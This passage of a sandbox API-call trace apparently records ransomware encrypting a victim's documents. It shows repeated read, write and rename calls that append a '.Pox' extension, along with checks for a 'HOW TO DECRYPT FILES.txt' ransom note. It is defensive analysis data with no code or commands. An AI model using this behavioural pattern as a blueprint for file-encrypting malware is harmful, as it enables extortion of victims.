HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3adff4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0039.935] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae454) returned 1 [0039.935] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae4d0 | out: lpFileInformation=0x3ae4d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0039.935] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae450) returned 1 [0039.936] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\e5 uvmMI3me7.pptx", nBufferLength=0x105, lpBuffer=0x3adecc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\e5 uvmMI3me7.pptx", lpFilePart=0x0) returned 0x59 [0039.936] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae3c0) returned 1 [0039.936] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\e5 uvmMI3me7.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\euu-xxmhirdjw4 2zx56\\b2naixbza6\\e5 uvmmi3me7.pptx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0039.937] GetFileType (hFile=0x26c) returned 0x1 [0039.937] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae3bc) returned 1 [0039.937] GetFileType (hFile=0x26c) returned 0x1 [0039.937] WriteFile (in: hFile=0x26c, lpBuffer=0x34c9980*, nNumberOfBytesToWrite=0x15ca0, lpNumberOfBytesWritten=0x3ae47c, lpOverlapped=0x0 | out: lpBuffer=0x34c9980*, lpNumberOfBytesWritten=0x3ae47c*=0x15ca0, lpOverlapped=0x0) returned 1 [0039.939] CloseHandle (hObject=0x26c) returned 1 [0039.941] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\e5 uvmMI3me7.pptx", nBufferLength=0x105, lpBuffer=0x3ae000, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\e5 uvmMI3me7.pptx", lpFilePart=0x0) returned 0x59 [0039.941] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\e5 uvmMI3me7.pptx.Pox", nBufferLength=0x105, lpBuffer=0x3ae000, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\e5 uvmMI3me7.pptx.Pox", lpFilePart=0x0) returned 0x5d [0039.941] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae460) returned 1 [0039.941] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\e5 uvmMI3me7.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\euu-xxmhirdjw4 2zx56\\b2naixbza6\\e5 uvmmi3me7.pptx"), fInfoLevelId=0x0, lpFileInformation=0x3ae4dc | out: lpFileInformation=0x3ae4dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd41219f0, ftCreationTime.dwHighDateTime=0x1d4d0ae, ftLastAccessTime.dwLowDateTime=0xa24c7350, ftLastAccessTime.dwHighDateTime=0x1d4d556, ftLastWriteTime.dwLowDateTime=0x29fe7140, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x15ca0)) returned 1 [0039.941] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae45c) returned 1 [0039.941] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\e5 uvmMI3me7.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\euu-xxmhirdjw4 2zx56\\b2naixbza6\\e5 uvmmi3me7.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\e5 uvmMI3me7.pptx.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\euu-xxmhirdjw4 2zx56\\b2naixbza6\\e5 uvmmi3me7.pptx.pox")) returned 1 [0039.942] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\lC2WFP1.xlsx", nBufferLength=0x105, lpBuffer=0x3adee0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\lC2WFP1.xlsx", lpFilePart=0x0) returned 0x54 [0039.942] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae3d4) returned 1 [0039.942] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\lC2WFP1.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\euu-xxmhirdjw4 2zx56\\b2naixbza6\\lc2wfp1.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0039.942] GetFileType (hFile=0x26c) returned 0x1 [0039.942] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae3d0) returned 1 [0039.942] GetFileType (hFile=0x26c) returned 0x1 [0039.942] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae4dc | out: lpFileSizeHigh=0x3ae4dc*=0x0) returned 0x136b8 [0039.942] ReadFile (in: hFile=0x26c, lpBuffer=0x248f394, nNumberOfBytesToRead=0x136b8, lpNumberOfBytesRead=0x3ae488, lpOverlapped=0x0 | out: lpBuffer=0x248f394*, lpNumberOfBytesRead=0x3ae488*=0x136b8, lpOverlapped=0x0) returned 1 [0039.943] CloseHandle (hObject=0x26c) returned 1 [0039.959] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3adff4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0039.959] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae454) returned 1 [0039.959] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae4d0 | out: lpFileInformation=0x3ae4d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0039.960] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae450) returned 1 [0039.960] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\lC2WFP1.xlsx", nBufferLength=0x105, lpBuffer=0x3adecc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\lC2WFP1.xlsx", lpFilePart=0x0) returned 0x54 [0039.960] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae3c0) returned 1 [0039.960] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\lC2WFP1.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\euu-xxmhirdjw4 2zx56\\b2naixbza6\\lc2wfp1.xlsx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0039.961] GetFileType (hFile=0x26c) returned 0x1 [0039.961] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae3bc) returned 1 [0039.961] GetFileType (hFile=0x26c) returned 0x1 [0039.961] WriteFile (in: hFile=0x26c, lpBuffer=0x25165d0*, nNumberOfBytesToWrite=0x136c0, lpNumberOfBytesWritten=0x3ae47c, lpOverlapped=0x0 | out: lpBuffer=0x25165d0*, lpNumberOfBytesWritten=0x3ae47c*=0x136c0, lpOverlapped=0x0) returned 1 [0039.963] CloseHandle (hObject=0x26c) returned 1 [0039.964] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\lC2WFP1.xlsx", nBufferLength=0x105, lpBuffer=0x3ae000, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\lC2WFP1.xlsx", lpFilePart=0x0) returned 0x54 [0039.964] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\lC2WFP1.xlsx.Pox", nBufferLength=0x105, lpBuffer=0x3ae000, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\lC2WFP1.xlsx.Pox", lpFilePart=0x0) returned 0x58 [0039.965] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae460) returned 1 [0039.965] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\lC2WFP1.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\euu-xxmhirdjw4 2zx56\\b2naixbza6\\lc2wfp1.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x3ae4dc | out: lpFileInformation=0x3ae4dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3b64aa0, ftCreationTime.dwHighDateTime=0x1d4cc7d, ftLastAccessTime.dwLowDateTime=0x17fcc270, ftLastAccessTime.dwHighDateTime=0x1d4d38c, ftLastWriteTime.dwLowDateTime=0x2a00d2a0, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x136c0)) returned 1 [0039.965] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae45c) returned 1 [0039.965] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\lC2WFP1.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\euu-xxmhirdjw4 2zx56\\b2naixbza6\\lc2wfp1.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\lC2WFP1.xlsx.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\euu-xxmhirdjw4 2zx56\\b2naixbza6\\lc2wfp1.xlsx.pox")) returned 1 [0039.965] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\OJrh2t9nE.pdf", nBufferLength=0x105, lpBuffer=0x3adee0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\OJrh2t9nE.pdf", lpFilePart=0x0) returned 0x55 [0039.965] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae3d4) returned 1 [0039.965] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\OJrh2t9nE.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\euu-xxmhirdjw4 2zx56\\b2naixbza6\\ojrh2t9ne.pdf"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0039.965] GetFileType (hFile=0x26c) returned 0x1 [0039.965] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae3d0) returned 1 [0039.966] GetFileType (hFile=0x26c) returned 0x1 [0039.966] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae4dc | out: lpFileSizeHigh=0x3ae4dc*=0x0) returned 0xe5e7 [0039.966] ReadFile (in: hFile=0x26c, lpBuffer=0x252a300, nNumberOfBytesToRead=0xe5e7, lpNumberOfBytesRead=0x3ae488, lpOverlapped=0x0 | out: lpBuffer=0x252a300*, lpNumberOfBytesRead=0x3ae488*=0xe5e7, lpOverlapped=0x0) returned 1 [0039.967] CloseHandle (hObject=0x26c) returned 1 [0039.982] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3adff4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0039.982] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae454) returned 1 [0039.982] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae4d0 | out: lpFileInformation=0x3ae4d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0039.982] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae450) returned 1 [0039.982] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\OJrh2t9nE.pdf", nBufferLength=0x105, lpBuffer=0x3adecc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\OJrh2t9nE.pdf", lpFilePart=0x0) returned 0x55 [0039.982] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae3c0) returned 1 [0039.983] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\OJrh2t9nE.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\euu-xxmhirdjw4 2zx56\\b2naixbza6\\ojrh2t9ne.pdf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0039.984] GetFileType (hFile=0x26c) returned 0x1 [0039.984] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae3bc) returned 1 [0039.984] GetFileType (hFile=0x26c) returned 0x1 [0039.984] WriteFile (in: hFile=0x26c, lpBuffer=0x25a22d0*, nNumberOfBytesToWrite=0xe5f0, lpNumberOfBytesWritten=0x3ae47c, lpOverlapped=0x0 | out: lpBuffer=0x25a22d0*, lpNumberOfBytesWritten=0x3ae47c*=0xe5f0, lpOverlapped=0x0) returned 1 [0039.985] CloseHandle (hObject=0x26c) returned 1 [0039.987] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\OJrh2t9nE.pdf", nBufferLength=0x105, lpBuffer=0x3ae000, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\OJrh2t9nE.pdf", lpFilePart=0x0) returned 0x55 [0039.987] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\OJrh2t9nE.pdf.Pox", nBufferLength=0x105, lpBuffer=0x3ae000, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\OJrh2t9nE.pdf.Pox", lpFilePart=0x0) returned 0x59 [0039.987] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae460) returned 1 [0039.988] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\OJrh2t9nE.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\euu-xxmhirdjw4 2zx56\\b2naixbza6\\ojrh2t9ne.pdf"), fInfoLevelId=0x0, lpFileInformation=0x3ae4dc | out: lpFileInformation=0x3ae4dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc147590, ftCreationTime.dwHighDateTime=0x1d4d556, ftLastAccessTime.dwLowDateTime=0xb277e20, ftLastAccessTime.dwHighDateTime=0x1d4c683, ftLastWriteTime.dwLowDateTime=0x2a059560, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0xe5f0)) returned 1 [0039.988] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae45c) returned 1 [0039.988] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\OJrh2t9nE.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\euu-xxmhirdjw4 2zx56\\b2naixbza6\\ojrh2t9ne.pdf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\OJrh2t9nE.pdf.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\euu-xxmhirdjw4 2zx56\\b2naixbza6\\ojrh2t9ne.pdf.pox")) returned 1 [0039.988] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\PthlTMNUNtM.xlsx", nBufferLength=0x105, lpBuffer=0x3adee0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\PthlTMNUNtM.xlsx", lpFilePart=0x0) returned 0x58 [0039.988] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae3d4) returned 1 [0039.988] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\PthlTMNUNtM.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\euu-xxmhirdjw4 2zx56\\b2naixbza6\\pthltmnuntm.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0039.988] GetFileType (hFile=0x26c) returned 0x1 [0039.988] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae3d0) returned 1 [0039.989] GetFileType (hFile=0x26c) returned 0x1 [0039.989] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae4dc | out: lpFileSizeHigh=0x3ae4dc*=0x0) returned 0x3419 [0039.989] ReadFile (in: hFile=0x26c, lpBuffer=0x25b0f40, nNumberOfBytesToRead=0x3419, lpNumberOfBytesRead=0x3ae488, lpOverlapped=0x0 | out: lpBuffer=0x25b0f40*, lpNumberOfBytesRead=0x3ae488*=0x3419, lpOverlapped=0x0) returned 1 [0039.990] CloseHandle (hObject=0x26c) returned 1 [0040.036] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3adff4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0040.036] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae454) returned 1 [0040.036] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae4d0 | out: lpFileInformation=0x3ae4d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0040.036] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae450) returned 1 [0040.036] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\PthlTMNUNtM.xlsx", nBufferLength=0x105, lpBuffer=0x3adecc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\PthlTMNUNtM.xlsx", lpFilePart=0x0) returned 0x58 [0040.036] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae3c0) returned 1 [0040.036] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\PthlTMNUNtM.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\euu-xxmhirdjw4 2zx56\\b2naixbza6\\pthltmnuntm.xlsx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0040.038] GetFileType (hFile=0x26c) returned 0x1 [0040.038] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae3bc) returned 1 [0040.038] GetFileType (hFile=0x26c) returned 0x1 [0040.038] WriteFile (in: hFile=0x26c, lpBuffer=0x2411be8*, nNumberOfBytesToWrite=0x3420, lpNumberOfBytesWritten=0x3ae47c, lpOverlapped=0x0 | out: lpBuffer=0x2411be8*, lpNumberOfBytesWritten=0x3ae47c*=0x3420, lpOverlapped=0x0) returned 1 [0040.039] CloseHandle (hObject=0x26c) returned 1 [0040.040] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\PthlTMNUNtM.xlsx", nBufferLength=0x105, lpBuffer=0x3ae000, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\PthlTMNUNtM.xlsx", lpFilePart=0x0) returned 0x58 [0040.040] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\PthlTMNUNtM.xlsx.Pox", nBufferLength=0x105, lpBuffer=0x3ae000, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\PthlTMNUNtM.xlsx.Pox", lpFilePart=0x0) returned 0x5c [0040.040] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae460) returned 1 [0040.040] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\PthlTMNUNtM.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\euu-xxmhirdjw4 2zx56\\b2naixbza6\\pthltmnuntm.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x3ae4dc | out: lpFileInformation=0x3ae4dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x411846c0, ftCreationTime.dwHighDateTime=0x1d4d2c4, ftLastAccessTime.dwLowDateTime=0xe561a9c0, ftLastAccessTime.dwHighDateTime=0x1d4c724, ftLastWriteTime.dwLowDateTime=0x2a0cb980, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x3420)) returned 1 [0040.040] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae45c) returned 1 [0040.040] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\PthlTMNUNtM.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\euu-xxmhirdjw4 2zx56\\b2naixbza6\\pthltmnuntm.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\PthlTMNUNtM.xlsx.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\euu-xxmhirdjw4 2zx56\\b2naixbza6\\pthltmnuntm.xlsx.pox")) returned 1 [0040.041] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\TUjNEjAe GTq.rtf", nBufferLength=0x105, lpBuffer=0x3adee0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\TUjNEjAe GTq.rtf", lpFilePart=0x0) returned 0x58 [0040.041] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae3d4) returned 1 [0040.041] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\TUjNEjAe GTq.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\euu-xxmhirdjw4 2zx56\\b2naixbza6\\tujnejae gtq.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0040.041] GetFileType (hFile=0x26c) returned 0x1 [0040.041] SetThreadErrorMode (dwNewMode=0x0, 